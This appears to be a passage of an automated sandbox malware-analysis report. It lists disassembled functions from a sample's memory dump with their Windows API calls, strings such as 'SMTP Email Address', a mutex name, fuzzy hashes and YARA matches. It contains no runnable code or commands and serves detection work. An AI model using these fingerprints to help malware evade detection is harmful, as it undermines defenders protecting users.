                                                                                                    • Instruction ID: c093bf76889acc17d1fa22036b65b016a06f1330f7e599f4f56079382a32407d
                                                                                                    • Opcode Fuzzy Hash: 27ad540d65e50a43cb431455240b37a87264fc6fb909ff777adbe444ef2102e1
                                                                                                    • Instruction Fuzzy Hash: C551D872908209AFEB11DBA4E841BEFB7B9EF05359F140467E900A7253D738DD09C7A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00438AD4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00438AD9
                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,755524D0,00000000,00000008), ref: 00438B5B
                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 00438BA8
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00438BC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseH_prologOpenQueryValue
                                                                                                    • String ID: $iEGLMJAcQM@$@
                                                                                                    • API String ID: 1233982722-1058998065
                                                                                                    • Opcode ID: 8cef86315792058ed0a07ba323027390ecde1c9bef360214210f4fc55a681c68
                                                                                                    • Instruction ID: 367bd93084d2a7a35925e445f485166969b1686228f1c74074b6aa4ed539c815
                                                                                                    • Opcode Fuzzy Hash: 8cef86315792058ed0a07ba323027390ecde1c9bef360214210f4fc55a681c68
                                                                                                    • Instruction Fuzzy Hash: 985178B0D002599ECB21CFA8D980AEEFBF9BF18304F14516EE449B7202DB745A89CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00434E00, Relevance: 10.6, APIs: 7, Instructions: 75stringregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
                                                                                                    • lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
                                                                                                    • lstrcpyW.KERNEL32 ref: 00434E68
                                                                                                    • lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00434E82
                                                                                                    • RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00435370,00000001), ref: 00434EB6
                                                                                                    • RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2943937744-0
                                                                                                    • Opcode ID: 0219d67e338bd40beddbb7ed987e369c0af50fc4acf4526ffcb48d48a81d74d0
                                                                                                    • Instruction ID: 3f527511bd662a90bea5e564ca16ff505b986783f0fc1497e79a41689b46f2dc
                                                                                                    • Opcode Fuzzy Hash: 0219d67e338bd40beddbb7ed987e369c0af50fc4acf4526ffcb48d48a81d74d0
                                                                                                    • Instruction Fuzzy Hash: 1D216375901118BFEB119F91DD49DEF7B7CEF09355F004066F905E1110EBB85E41CAA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043592B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
                                                                                                    • RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
                                                                                                    • RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
                                                                                                    • RegCloseKey.ADVAPI32(00000100), ref: 004359EE
                                                                                                      • Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$CloseOpen_free
                                                                                                    • String ID: SMTP Email Address
                                                                                                    • API String ID: 3744367872-3214364705
                                                                                                    • Opcode ID: b2897442432286f6c7a9022d3ac1aee0ff1fca355918e22b49cf5c7a22221acd
                                                                                                    • Instruction ID: bea77520f8f9eb75bb65e4d96276d8d86ba46bdd8d66cb8aacbcea5d3b3ef5e9
                                                                                                    • Opcode Fuzzy Hash: b2897442432286f6c7a9022d3ac1aee0ff1fca355918e22b49cf5c7a22221acd
                                                                                                    • Instruction Fuzzy Hash: 53319FB1A00609FBEF20DF51DC81FAB7769EF48764F105026FD04AA240E339DD018B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00439060, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00439095
                                                                                                    • CreateProcessA.KERNEL32 ref: 0043911E
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00439127
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00439130
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$CreateFileModuleNameProcess
                                                                                                    • String ID: N
                                                                                                    • API String ID: 2820832629-1130791706
                                                                                                    • Opcode ID: 537e7a186abd502eaad7ebf34fdc1c2b917a28003db7b6770d01e220b166d494
                                                                                                    • Instruction ID: 68ee94fd2c3d38f532c313cd76568c7e192aa3a233b4418db67ca55748b57ded
                                                                                                    • Opcode Fuzzy Hash: 537e7a186abd502eaad7ebf34fdc1c2b917a28003db7b6770d01e220b166d494
                                                                                                    • Instruction Fuzzy Hash: 24218771D1024CBFEB019BA8DC85EEEB77CFF58304F005166F609A2021E6B15A89CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042026B, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0042027F
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0042028D
                                                                                                    • _strcat.LIBCMT ref: 004202F3
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 00420310
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00420324
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AttributesCreateDirectoryFile$_strcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2481838186-0
                                                                                                    • Opcode ID: 5386050ffdcb0e579c67ccba1131c0ef88f796de169c57935e7edbd14464b3f9
                                                                                                    • Instruction ID: 926b765d940c7e4cf03c66ed4fade1eb7be7ee2715b4740a0b314bdbf1d4a8a6
                                                                                                    • Opcode Fuzzy Hash: 5386050ffdcb0e579c67ccba1131c0ef88f796de169c57935e7edbd14464b3f9
                                                                                                    • Instruction Fuzzy Hash: B7116A71F0032457CB204668BC8CBDB77AC9F56314F9401E7E59593292DAB84D85467C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409478, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040947D
                                                                                                      • Part of subcall function 0043F433: FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449
                                                                                                    • LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 004094C3
                                                                                                    • LocalFree.KERNEL32(?), ref: 004094DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLocal$FormatH_prologMessage
                                                                                                    • String ID: unknown error
                                                                                                    • API String ID: 252809769-3078798498
                                                                                                    • Opcode ID: 2db4dc4c1e5e5555505e2b08480146aad6ece04c266066ea01a146b90769ed6f
                                                                                                    • Instruction ID: 143033a275fd9ea4cf15bf30338bea89ac0712dc1e52f0ce6ff51ee7e44748fa
                                                                                                    • Opcode Fuzzy Hash: 2db4dc4c1e5e5555505e2b08480146aad6ece04c266066ea01a146b90769ed6f
                                                                                                    • Instruction Fuzzy Hash: F1014471900205AFDB11EFA5C941AAEBBB5FF18304F10843FB449B7252D7789E04CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B7F6, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00488780,00000000,?,?,004207F8,00000000,?,00000000), ref: 0040B80A
                                                                                                    • CreateDirectoryTransactedA.KERNEL32 ref: 0040B823
                                                                                                    • CommitTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B82E
                                                                                                    • RollbackTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B836
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Transaction$Create$CommitDirectoryRollbackTransacted
                                                                                                    • String ID:
                                                                                                    • API String ID: 629542334-0
                                                                                                    • Opcode ID: 50e14b63ca18d633df6a308b7ec4a38018a85421cc885a30688cbf6e21692c77
                                                                                                    • Instruction ID: b18be14526ba35e09e9024abd98d8d90bc636f0dd60b729d8671da52b2d2403f
                                                                                                    • Opcode Fuzzy Hash: 50e14b63ca18d633df6a308b7ec4a38018a85421cc885a30688cbf6e21692c77
                                                                                                    • Instruction Fuzzy Hash: 53F0B472A00115BFE71027999CCCD677A2CEB457B47144636FA22A22E0F7B09C4186FE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042BFF5, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 0042C008
                                                                                                    • RemoveDirectoryTransactedA.KERNEL32 ref: 0042C01F
                                                                                                    • CommitTransaction.KTMW32(00000000,?,00000000), ref: 0042C02A
                                                                                                    • RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042C032
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
                                                                                                    • String ID:
                                                                                                    • API String ID: 1201024725-0
                                                                                                    • Opcode ID: 52e9d3ae115f385b2bf6edc5f6143662b3c9fc35e394ef1331fad7615f1dd12f
                                                                                                    • Instruction ID: 183120d38f6de6230f0cb0750d318de0fef5fbbbb85c50116f72fc63eed6bb1a
                                                                                                    • Opcode Fuzzy Hash: 52e9d3ae115f385b2bf6edc5f6143662b3c9fc35e394ef1331fad7615f1dd12f
                                                                                                    • Instruction Fuzzy Hash: 21F0E272B00120FFE7200BA9AC4CD7B766CDB46770B10062AFC22D72D0E6B49D4186BA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B7A7, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00000000,00000000,?,004209C9,00000000), ref: 0040B7BA
                                                                                                    • DeleteFileTransactedA.KERNEL32 ref: 0040B7D1
                                                                                                    • CommitTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7DC
                                                                                                    • RollbackTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
                                                                                                    • String ID:
                                                                                                    • API String ID: 3802493581-0
                                                                                                    • Opcode ID: 87cd324ad1989c0657320156594595a03bd9424eab885f956801388e9c53cdfe
                                                                                                    • Instruction ID: 58dbb2a7c24e90d438a2da79032e2a45378735c8f22fe598a552312de627870f
                                                                                                    • Opcode Fuzzy Hash: 87cd324ad1989c0657320156594595a03bd9424eab885f956801388e9c53cdfe
                                                                                                    • Instruction Fuzzy Hash: 1BF08272A00111BFE7205B6A9C0DD6B766DDB8A770714063AFC22E72D0E7B49D4186BF
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00435BAC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00020008,?), ref: 00435BC4
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00435BCB
                                                                                                    • GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 00435BDD
                                                                                                    • CloseHandle.KERNEL32(?,?,00000200), ref: 00435BEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 1246687928-0
                                                                                                    • Opcode ID: 69e4764cfb4a4ffa93866ed4cffa959fab9716cde869fc8d8eef6bd74acf3750
                                                                                                    • Instruction ID: ef9c7944da9d0fbe57d85c82d9cb878354d8ff5e49230341588292012951431b
                                                                                                    • Opcode Fuzzy Hash: 69e4764cfb4a4ffa93866ed4cffa959fab9716cde869fc8d8eef6bd74acf3750
                                                                                                    • Instruction Fuzzy Hash: DBF01C71E10208BBEB109BA0DC49EAA7BACEB09244F1000A5E802E1150E6B5EA009A6A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00457A19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000005,~eD,00000000,?,00457F36,00000010,~eD,00000000,?,00421A56,~eD), ref: 00457AB5
                                                                                                    • GetLastError.KERNEL32(?,00457F36,00000010,~eD,00000000,?,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457ADB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: ~eD
                                                                                                    • API String ID: 442123175-3356853795
                                                                                                    • Opcode ID: d3e58a8c19795838d8790d9ee971bd9e06b8036a9d053c66fc8a29a12884aee6
                                                                                                    • Instruction ID: bf65c0e4729e722a36b1f943ebc6129d69d6e6920ac8c12f1595faf670b95aa8
                                                                                                    • Opcode Fuzzy Hash: d3e58a8c19795838d8790d9ee971bd9e06b8036a9d053c66fc8a29a12884aee6
                                                                                                    • Instruction Fuzzy Hash: F1217E30A042199BDF15CF29DD80AEDB7B9EB49306F2440BAED06D7212D634DE46CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004360E7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39synchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenMutexA.KERNEL32 ref: 00436130
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Mutex$CreateOpen
                                                                                                    • String ID: ENXX
                                                                                                    • API String ID: 4030545807-3763919171
                                                                                                    • Opcode ID: 15fe73319a016700f1fa3f76bfd36faf01a2ded22a65ec7536cca4f95705d9f2
                                                                                                    • Instruction ID: d7b7153b0c48b5d91a1f0c999520678bb0e8285682fdc18e12bdb9ee44f3034a
                                                                                                    • Opcode Fuzzy Hash: 15fe73319a016700f1fa3f76bfd36faf01a2ded22a65ec7536cca4f95705d9f2
                                                                                                    • Instruction Fuzzy Hash: D0F04610D083897ACF029BF90C458FFBFFC9D1E284F40A06EE84163203F5A4454583BA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004542F3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID: 0xn
                                                                                                    • API String ID: 269201875-2529592099
                                                                                                    • Opcode ID: 8f143674587b4427197da0dda2d9d693b879d22fe589f1b0c88b564db47b76a3
                                                                                                    • Instruction ID: d5218cd339a65762510a81b9e079e4446c8f6c3996e41a5cb6ded0dde42ff173
                                                                                                    • Opcode Fuzzy Hash: 8f143674587b4427197da0dda2d9d693b879d22fe589f1b0c88b564db47b76a3
                                                                                                    • Instruction Fuzzy Hash: 49E0303270951066D221662B6C0566E15859BD133FF11033FFC208E5F2DB6C488A959E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004349A2, Relevance: 4.6, APIs: 3, Instructions: 73libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 145871493-0
                                                                                                    • Opcode ID: 2337a6c10410b4f4f6a790c5cc088a69878ab76c52ec47e284b886de45f41515
                                                                                                    • Instruction ID: f49f4c1cb75c5fbd49bede2b2b2e0205ee8556af43aa466e30f1fd9c6e14c3ef
                                                                                                    • Opcode Fuzzy Hash: 2337a6c10410b4f4f6a790c5cc088a69878ab76c52ec47e284b886de45f41515
                                                                                                    • Instruction Fuzzy Hash: 38213874E04248DF9B05DFA898508FFFBB9EE9A304F0451AED841B3201EB749E05CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A9DC, Relevance: 4.6, APIs: 3, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040A9E1
                                                                                                    • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C
                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040AA60
                                                                                                      • Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                                                                                    • String ID:
                                                                                                    • API String ID: 3696715561-0
                                                                                                    • Opcode ID: f4157fbba5393df25be266b8d86e8ad444bdf97aae6fe7055065db7a5b06c5af
                                                                                                    • Instruction ID: 0113cde70424d24ccef5238eb5fdd89d76e8d8ac18f929500eaf95b908a89b9e
                                                                                                    • Opcode Fuzzy Hash: f4157fbba5393df25be266b8d86e8ad444bdf97aae6fe7055065db7a5b06c5af
                                                                                                    • Instruction Fuzzy Hash: 0421D231710705EBCF20EAA5DA81BDE73A5AF08314F10442BF802A61D1D7789E51CBAB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00460615, Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0046061E
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0046068C
                                                                                                      • Part of subcall function 0045AB92: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0045CBC8,?,00000000,00000000), ref: 0045AC34
                                                                                                      • Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0
                                                                                                    • _free.LIBCMT ref: 0046067D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2560199156-0
                                                                                                    • Opcode ID: 429607cf4b6556999384f6fde31a38f6863d3d36cea50794b30d99dff19d6418
                                                                                                    • Instruction ID: 2d08a8e01bfa14f0e9bf738908fa259ffbb5ee05d2513bf0bc5b5480d6e09692
                                                                                                    • Opcode Fuzzy Hash: 429607cf4b6556999384f6fde31a38f6863d3d36cea50794b30d99dff19d6418
                                                                                                    • Instruction Fuzzy Hash: 1001FCB2E012117B67315A775C88D7B585DCDC6B95315012FFD01D6202F9A8CD1181FF
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041EF49, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000244,?,?,0041FD07,00000140,?,?,00000000), ref: 0041EF66
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,00000000,?,0041FD07,00000140,?,?,00000000,?,004205B0), ref: 0041EF87
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,0041FD07,00000140,?,?,00000000,?,004205B0,?,?,00000244,00488780), ref: 0041EFC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Pointer$Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 250661774-0
                                                                                                    • Opcode ID: 9bb9fcf026c393e84acaf82252b53d31753f1648a71a9be899f94c0f359409e5
                                                                                                    • Instruction ID: 590f5f10effc152a812acbf342452f322146615697fe813b7eabbc86673be59a
                                                                                                    • Opcode Fuzzy Hash: 9bb9fcf026c393e84acaf82252b53d31753f1648a71a9be899f94c0f359409e5
                                                                                                    • Instruction Fuzzy Hash: 81118674A44305BEE7108F399C85F96BB98FB05320F104625F925D72C1D3B4A9408764
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043DBE2, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileMappingA.KERNEL32 ref: 0043DC15
                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,4876E7FF,?,?,00004098,75146490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC32
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00004098,75146490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC42
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleMappingView
                                                                                                    • String ID:
                                                                                                    • API String ID: 1187395538-0
                                                                                                    • Opcode ID: e48d622de60c70f1e6bb29bf885ae58b6a6e0b3b64331a7a970e46566c513ccf
                                                                                                    • Instruction ID: 550ff010cc939da366848678e5ec9f0b7c02c89e159099b7b19e896844ef7b36
                                                                                                    • Opcode Fuzzy Hash: e48d622de60c70f1e6bb29bf885ae58b6a6e0b3b64331a7a970e46566c513ccf
                                                                                                    • Instruction Fuzzy Hash: D7115670D10B009EDB328B17AC44B13BAE9EB9A761F10652FE59581640D6F49844DF6D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00459D09, Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00421A56,00000000,00000002,00421A56,00000000,?,?,?,00459DB6,00000000,00000000,00421A56,00000002), ref: 00459D42
                                                                                                    • GetLastError.KERNEL32(?,00459DB6,00000000,00000000,00421A56,00000002,?,004464A1,?,00000000,00000000,00000001,00421A56,?,?,00446557), ref: 00459D4C
                                                                                                    • __dosmaperr.LIBCMT ref: 00459D53
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2336955059-0
                                                                                                    • Opcode ID: 27104622859b43d5d0758ad57ef1ede1b45be39dee652525f4e95165173d909b
                                                                                                    • Instruction ID: a1e4ff7bec2cfff123a609e7ffbf930a0197e3222467c7c804d78764c443cfe2
                                                                                                    • Opcode Fuzzy Hash: 27104622859b43d5d0758ad57ef1ede1b45be39dee652525f4e95165173d909b
                                                                                                    • Instruction Fuzzy Hash: 45014C33B00115EFCF159F59DC0586E3B39DF85321B24020AF8119B291FB75DD0587A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042B31D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042B322
                                                                                                      • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                      • Part of subcall function 0042BC7F: __EH_prolog.LIBCMT ref: 0042BC84
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Deallocate
                                                                                                    • String ID: "\
                                                                                                    • API String ID: 2428181759-2226538752
                                                                                                    • Opcode ID: 931fbd30df64de13f54db58f1330a1f6728511ae8382888bbb83b201639d661e
                                                                                                    • Instruction ID: 74c8e02cedf363cec93cb5a21cd2564252097201552f7d0fce9620bf0d274a46
                                                                                                    • Opcode Fuzzy Hash: 931fbd30df64de13f54db58f1330a1f6728511ae8382888bbb83b201639d661e
                                                                                                    • Instruction Fuzzy Hash: 3FC1E130E04258CBDF15EFA5C9906EDBB71EF55308F5480AED0497B242DF381A89CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

